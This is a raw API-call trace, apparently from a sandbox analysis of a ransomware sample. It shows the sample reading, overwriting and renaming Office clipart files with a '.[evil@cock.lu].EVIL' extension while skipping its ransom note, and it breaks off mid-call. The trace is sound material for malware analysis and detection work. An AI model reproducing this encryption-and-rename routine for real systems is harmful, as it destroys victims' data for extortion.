[0157.380] wcscmp (_String1="J0400002.PNG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.380] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0400002.PNG") returned 0x0 [0157.380] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG") returned 0x45 [0157.380] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.382] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15d49, lpOverlapped=0x0) returned 1 [0157.599] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.599] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.599] _errno () returned 0x84b1160840 [0157.599] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.599] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x15d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15d60, lpOverlapped=0x0) returned 1 [0157.599] CloseHandle (hObject=0x1a8) returned 1 [0157.599] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.599] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.600] __uncaught_exception () returned 0x84b1160800 [0157.600] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.600] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400002.png.[evil@cock.lu].evil")) returned 1 [0157.601] ??_V@YAXPEAX@Z () returned 0x1 [0157.603] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG", dwFileAttributes=0x200) returned 0 [0157.604] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.628] wcsstr (_Str="J0400003.PNG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.628] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG") returned 69 [0157.628] wcscmp (_String1="J0400003.PNG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.628] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0400003.PNG") returned 0x0 [0157.628] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG") returned 0x45 [0157.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.630] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e836, lpOverlapped=0x0) returned 1 [0157.646] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.646] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.646] _errno () returned 0x84b1160840 [0157.646] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.646] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1e840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e840, lpOverlapped=0x0) returned 1 [0157.646] CloseHandle (hObject=0x1a8) returned 1 [0157.647] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.647] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.647] __uncaught_exception () returned 0x84b1160800 [0157.647] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.647] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400003.png.[evil@cock.lu].evil")) returned 1 [0157.648] ??_V@YAXPEAX@Z () returned 0x1 [0157.651] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400003.PNG", dwFileAttributes=0x200) returned 0 [0157.651] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.651] wcsstr (_Str="J0400004.PNG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.651] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG") returned 69 [0157.651] wcscmp (_String1="J0400004.PNG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0400004.PNG") returned 0x0 [0157.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG") returned 0x45 [0157.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.653] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19a5d, lpOverlapped=0x0) returned 1 [0157.661] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.661] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.661] _errno () returned 0x84b1160840 [0157.661] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.661] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x19a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x19a60, lpOverlapped=0x0) returned 1 [0157.661] CloseHandle (hObject=0x1a8) returned 1 [0157.661] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.662] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.662] __uncaught_exception () returned 0x84b1160800 [0157.662] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.662] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400004.png.[evil@cock.lu].evil")) returned 1 [0157.663] ??_V@YAXPEAX@Z () returned 0x1 [0157.666] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400004.PNG", dwFileAttributes=0x200) returned 0 [0157.666] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.666] wcsstr (_Str="J0400005.PNG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.666] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG") returned 69 [0157.666] wcscmp (_String1="J0400005.PNG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.666] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0400005.PNG") returned 0x0 [0157.666] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG") returned 0x45 [0157.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.668] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17742, lpOverlapped=0x0) returned 1 [0157.676] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.676] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.676] _errno () returned 0x84b1160840 [0157.676] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.676] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17760, lpOverlapped=0x0) returned 1 [0157.676] CloseHandle (hObject=0x1a8) returned 1 [0157.677] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.677] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.677] __uncaught_exception () returned 0x84b1160800 [0157.677] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.677] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400005.png.[evil@cock.lu].evil")) returned 1 [0157.678] ??_V@YAXPEAX@Z () returned 0x1 [0157.681] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400005.PNG", dwFileAttributes=0x200) returned 0 [0157.681] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.681] wcsstr (_Str="JAVA_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.681] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 68 [0157.681] wcscmp (_String1="JAVA_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.681] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="JAVA_01.MID") returned 0x0 [0157.681] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID") returned 0x44 [0157.681] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.683] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2645, lpOverlapped=0x0) returned 1 [0157.689] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.689] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.690] _errno () returned 0x84b1160840 [0157.690] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.690] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2660, lpOverlapped=0x0) returned 1 [0157.690] CloseHandle (hObject=0x1a8) returned 1 [0157.690] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.690] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.690] __uncaught_exception () returned 0x84b1160800 [0157.690] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.690] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\java_01.mid.[evil@cock.lu].evil")) returned 1 [0157.691] ??_V@YAXPEAX@Z () returned 0x1 [0157.694] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JAVA_01.MID", dwFileAttributes=0x200) returned 0 [0157.694] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.694] wcsstr (_Str="JNGLE_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.694] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 69 [0157.694] wcscmp (_String1="JNGLE_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.694] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="JNGLE_01.MID") returned 0x0 [0157.694] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 0x45 [0157.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.696] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16d3, lpOverlapped=0x0) returned 1 [0157.703] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.703] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.703] _errno () returned 0x84b1160840 [0157.704] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.704] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16e0, lpOverlapped=0x0) returned 1 [0157.704] CloseHandle (hObject=0x1a8) returned 1 [0157.704] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.704] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.704] __uncaught_exception () returned 0x84b1160800 [0157.704] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.704] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid.[evil@cock.lu].evil")) returned 1 [0157.705] ??_V@YAXPEAX@Z () returned 0x1 [0157.708] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID", dwFileAttributes=0x200) returned 0 [0157.708] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.708] wcsstr (_Str="MP00021_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.708] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF") returned 69 [0157.708] wcscmp (_String1="MP00021_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.708] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MP00021_.WMF") returned 0x0 [0157.708] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF") returned 0x45 [0157.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.710] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15f6, lpOverlapped=0x0) returned 1 [0157.717] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.717] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.717] _errno () returned 0x84b1160840 [0157.717] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.717] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1600, lpOverlapped=0x0) returned 1 [0157.717] CloseHandle (hObject=0x1a8) returned 1 [0157.718] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.718] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.718] __uncaught_exception () returned 0x84b1160800 [0157.718] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.718] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf.[evil@cock.lu].evil")) returned 1 [0157.719] ??_V@YAXPEAX@Z () returned 0x1 [0157.722] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF", dwFileAttributes=0x200) returned 0 [0157.722] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.722] wcsstr (_Str="MP00132_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.722] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF") returned 69 [0157.722] wcscmp (_String1="MP00132_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MP00132_.WMF") returned 0x0 [0157.722] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF") returned 0x45 [0157.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.725] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1090, lpOverlapped=0x0) returned 1 [0157.732] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.732] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.732] _errno () returned 0x84b1160840 [0157.732] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.732] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10a0, lpOverlapped=0x0) returned 1 [0157.732] CloseHandle (hObject=0x1a8) returned 1 [0157.732] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.733] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.733] __uncaught_exception () returned 0x84b1160800 [0157.733] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.733] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf.[evil@cock.lu].evil")) returned 1 [0157.734] ??_V@YAXPEAX@Z () returned 0x1 [0157.736] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF", dwFileAttributes=0x200) returned 0 [0157.737] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.737] wcsstr (_Str="MP00646_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.737] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF") returned 69 [0157.737] wcscmp (_String1="MP00646_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.737] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="MP00646_.WMF") returned 0x0 [0157.737] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF") returned 0x45 [0157.737] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00646_.WMF" 